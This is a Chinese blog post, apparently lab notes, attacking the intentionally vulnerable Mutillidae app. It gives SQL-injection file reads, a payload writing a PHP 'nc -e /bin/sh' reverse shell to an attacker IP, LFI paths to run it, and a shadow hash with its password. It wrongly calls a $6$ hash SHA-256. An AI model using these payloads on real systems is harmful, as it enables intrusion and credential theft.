1. 使用sql injection read file and write file .
使用php的load_file函数来读取文件,成功的读取到了/etc/passwd,但是不能读取/etc/shadow. 我搞不清楚为什么.
-
http://192.168.0.119/mutillidae/index.php?page=user-info.php&username=kobe' union select 1,load_file("/etc/passwd"),null,null,null%23&password=aaa&user-info-php-submit-button=View+Account+Details
-
' union select 1,load_file("/etc/shadow"),null,null,null%23&password=aaa&user-info-php-submit-button=View+Account+Details
使用php的outfile()函数来write file .
首先在网页
-
http://192.168.0.119/mutillidae/index.php?page=user-info.php
中Name上写入:
-
kobe' union select null,'<?passthru("nc -e /bin/sh 192.168.0.104 8080");?>',null,null,null into outfile '/tmp/reverse.php #
password 留空,然后直接点击View Account Details, 意味着使用GET方式提交了数据后。在服务器端生成了/tmp/rever.php 文件。
2. 利用Local File Inclusion 漏洞运行该文件获得反弹shell.
我的Kali Linux IP地址为192.168.0.104. 在Kali 上监听8080端口
然后打开网页,输入下面的地址. 就获得了一个反弹shell.
-
http://192.168.0.119/mutillidae/index.php?page=../../../../../tmp/reverse.php
3. Local file inclusion 最好玩的在于: 我可以直接浏览/etc/passwd 文件,但是当我尝试浏览/etc/shadow的时候,出现了报错. 如果获得了/etc/shadow文件的内容,那一定是件很美妙的事情.
-
http://192.168.0.119/mutillidae/index.php?page=../../../../../etc/passwd
-
-
Warning: include(../../../../../etc/shadow) []: failed to open stream: Permission denied in /var/www/mutillidae/index.php on line 469
-
Warning: include() []: Failed opening '../../../../../etc/shadow' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/mutillidae/index.php on line 469
4. eg:
我本机kali linux 的一个用户名叫jack, 密码为ass123.
打开/etc/shadow. 得到Jack的密码哈希, 这个哈希是怎么来的呢?使用hash-identifier 来检查,发现这是个SHA-256的散列, 可以尝试
-
jack:$6$P/OAszmX$q/Q6t6cFJS0yqEuK/Y0gbVeiE4hw7YXENeYI.vxf3KPFG4i2M3zCIUtjJyMHq7ozOd.hRvz/UhvsdjARM08f80:17473:0:99999:7:::
-
hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 #
# By Zion3R #
# #
# Root@Blackploit.com #
#########################################################################
-------------------------------------------------------------------------
HASH: $6$P/OAszmX$q/Q6t6cFJS0yqEuK/Y0gbVeiE4hw7YXENeYI.vxf3KPFG4i2M3zCIUtjJyMHq7ozOd.hRvz/UhvsdjARM08f80
Possible Hashs:
[+] SHA-256
但是我知道这个Hash应该是salted,加了盐,也许可以尝试用JohnTheRipper试试看.
或者查看下这个网站:
-
Sha-256 is a function of algorithm Sha-2 (as 384, 512, and more recently 224 bits versions), which is the evolution of Sha-1, itself an evolution of Sha-0. Sha-2 algorithm was developed by NSA to answer the security problem of Sha-1, since the theorical discover of a 2^63 operations for collisions. This algorithm takes as input a 2^64 maximum length message, and outputs a 256 bits hash. It seems that sha256 is becoming more and more used in order to replace the old md5 hash function. I think that sha256 is actually the best replacement because of its good balance between online storage size and security. As the others cryptographic functions of its "family", Sha-256 is unilateral so you can't find the plaintext with only the hash. You have to compare this hash to a online database, and that's what we do here with a 3,771,960,346 sha256 hash database. I looked for days to find any wordlist online. Then I computed for days to enlarge the wordlist and make it really unique.
还有一个网站做的挺好看,可惜SHA-256根本就不支持.
-
https://www.onlinehashcrack.com/
阅读(700) | 评论(0) | 转发(0) |
